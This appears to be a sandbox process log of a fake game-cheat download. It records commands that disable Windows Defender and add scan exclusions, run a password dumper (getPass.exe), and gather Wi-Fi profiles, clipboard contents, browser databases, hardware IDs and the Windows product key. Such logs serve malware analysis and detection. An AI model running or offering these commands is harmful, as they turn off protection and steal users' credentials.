"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5284 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=1744 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1304 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6540 /prefetch:8

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6808 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2248 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3804 /prefetch:1

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\Fortnite-external-updated-main\Fortnite-external-updated-main\VANTA.rar"

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4244 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5676 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6688 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6244 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5236 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5968 /prefetch:8

C:\Users\Admin\Downloads\vt.exe

"C:\Users\Admin\Downloads\vt.exe"

C:\Users\Admin\Downloads\vt.exe

"C:\Users\Admin\Downloads\vt.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "net session"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Unblock-File '.\vt.exe'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Unblock-File '.\vt.exe'

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\vt.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\vt.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Unblock-File '.\getPass'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "dir leveldb /AD /s /b"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Unblock-File '.\getPass'

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "where /r . *.sqlite"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "dir leveldb /AD /s /b"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\where.exe

where /r . *.sqlite

C:\Windows\system32\tree.com

tree /A /F

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getPass.exe /stext pass.txt"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\tree.com

tree /A /F

C:\Users\Admin\AppData\Local\Temp\_MEI42562\getPass.exe

getPass.exe /stext pass.txt

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Users\Admin\Downloads\vt.exe

"C:\Users\Admin\Downloads\vt.exe"

C:\Users\Admin\Downloads\vt.exe

"C:\Users\Admin\Downloads\vt.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "net session"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Unblock-File '.\vt.exe'"

C:\Windows\system32\net.exe

net session

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Unblock-File '.\vt.exe'

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\vt.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\vt.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Unblock-File '.\getPass'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Unblock-File '.\getPass'

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "dir leveldb /AD /s /b"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "where /r . *.sqlite"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "dir leveldb /AD /s /b"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\system32\where.exe

where /r . *.sqlite

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getPass.exe /stext pass.txt"

C:\Users\Admin\AppData\Local\Temp\_MEI55522\getPass.exe

getPass.exe /stext pass.txt

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\Desktop\VANTA\x64\Release\GeforceNOW.exe

"C:\Users\Admin\Desktop\VANTA\x64\Release\GeforceNOW.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Users\Admin\Desktop\VANTA\x64\Release\Vanguardmapper.exe

"C:\Users\Admin\Desktop\VANTA\x64\Release\Vanguardmapper.exe"

C:\Users\Admin\Desktop\VANTA\x64\Release\Vanguardmapper.exe

"C:\Users\Admin\Desktop\VANTA\x64\Release\Vanguardmapper.exe"

C:\Users\Admin\Desktop\VANTA\x64\Release\mapper.exe

"C:\Users\Admin\Desktop\VANTA\x64\Release\mapper.exe"

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\Downloads\vt.exe

"C:\Users\Admin\Downloads\vt.exe"

C:\Users\Admin\Downloads\vt.exe

"C:\Users\Admin\Downloads\vt.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "net session"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Unblock-File '.\vt.exe'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Unblock-File '.\vt.exe'

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\vt.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\vt.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Unblock-File '.\getPass'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Unblock-File '.\getPass'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "dir leveldb /AD /s /b"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "where /r . *.sqlite"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "dir leveldb /AD /s /b"

C:\Windows\system32\where.exe

where /r . *.sqlite

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getPass.exe /stext pass.txt"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Users\Admin\AppData\Local\Temp\_MEI21802\getPass.exe

getPass.exe /stext pass.txt

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0x78,0x108,0x7ff9747646f8,0x7ff974764708,0x7ff974764718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

